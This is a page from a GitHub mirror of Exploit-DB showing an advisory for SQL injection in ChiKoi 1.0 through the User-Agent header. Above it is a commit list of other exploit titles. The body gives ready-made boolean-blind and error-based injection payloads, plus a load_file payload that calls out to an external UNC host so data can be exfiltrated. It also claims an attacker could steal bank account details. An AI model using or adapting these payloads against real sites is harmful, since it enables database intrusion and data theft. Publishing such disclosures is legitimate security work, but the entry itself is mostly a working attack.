bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51202.txt
Exploit-DB d4e68dbb7e DB: 2023-04-04 
39 changes to exploits/shellcodes/ghdb

ProLink PRS1841 PLDT Home fiber - Default Password

Nacos 2.0.3 - Access Control vulnerability

sudo 1.8.0 to 1.9.12p1 - Privilege Escalation

sleuthkit 4.11.1 - Command Injection

Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)

ManageEngin AMP 4.3.0 - File-path-traversal

SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS)

AmazCart CMS 3.4 - Cross-Site-Scripting (XSS)
Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated
Art Gallery Management System Project v1.0 - SQL Injection (sqli) Unauthenticated

ChiKoi v1.0 - SQL Injection

ERPGo SaaS 3.9 - CSV Injection

GLPI  Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)

GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin
GLPI Activity  v3.1.0 - Authenticated Local File Inclusion on Activity plugin
GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion
GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure
GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)

Metform Elementor Contact Form Builder v3.1.2 - Unauthenticated Stored Cross-Site Scripting (XSS)

MyBB 1.8.32 - Remote Code Execution (RCE) (Authenticated)

Paid Memberships Pro  v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection

pimCore v5.4.18-skeleton  - Sensitive Cookie with Improper SameSite Attribute

Prizm Content Connect v10.5.1030.8315 - XXE

SLIMSV 9.5.2 - Cross-Site Scripting (XSS)

WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE

Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS)
Roxy WI v6.1.0.0 - Improper Authentication Control
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload

Solaris 10 libXm - Buffer overflow Local privilege escalation

Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path

Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow

HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path

Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path

Windows 11 10.0.22000 -  Backup service Privilege Escalation

Windows/x86 - Create Administrator User / Dynamic PEB & EDT method null-free Shellcode (373 bytes)
2023-04-04 00:16:32 +00:00

87 lines
No EOL
3 KiB
Text
Raw Blame History

## Title: ChiKoi-1.0 SQLi
## Author: nu11secur1ty
## Date: 01.12.2023
## Vendor: https://chikoiquan.tanhongit.com/
## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi
## Description:
The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'
was submitted in the User-Agent HTTP header.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The attacker can steal all information from this system and can
seriously harm the users of this system,
such as extracting bank accounts through which they pay each other, etc.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Payload:
```MySQL
---
Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND
9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION
SELECT 6994) END))-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND
(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT
(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR
---
```
[+] Online:
```MySQL
---
Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)
Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND
8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION
SELECT 6426) END))-- -
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)
## Proof and Exploit:
[href](https://streamable.com/7x69yz)
## Time spent
`01:30:00`
## Writing an exploit
`00:05:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Reference in a new issue View git blame Copy permalink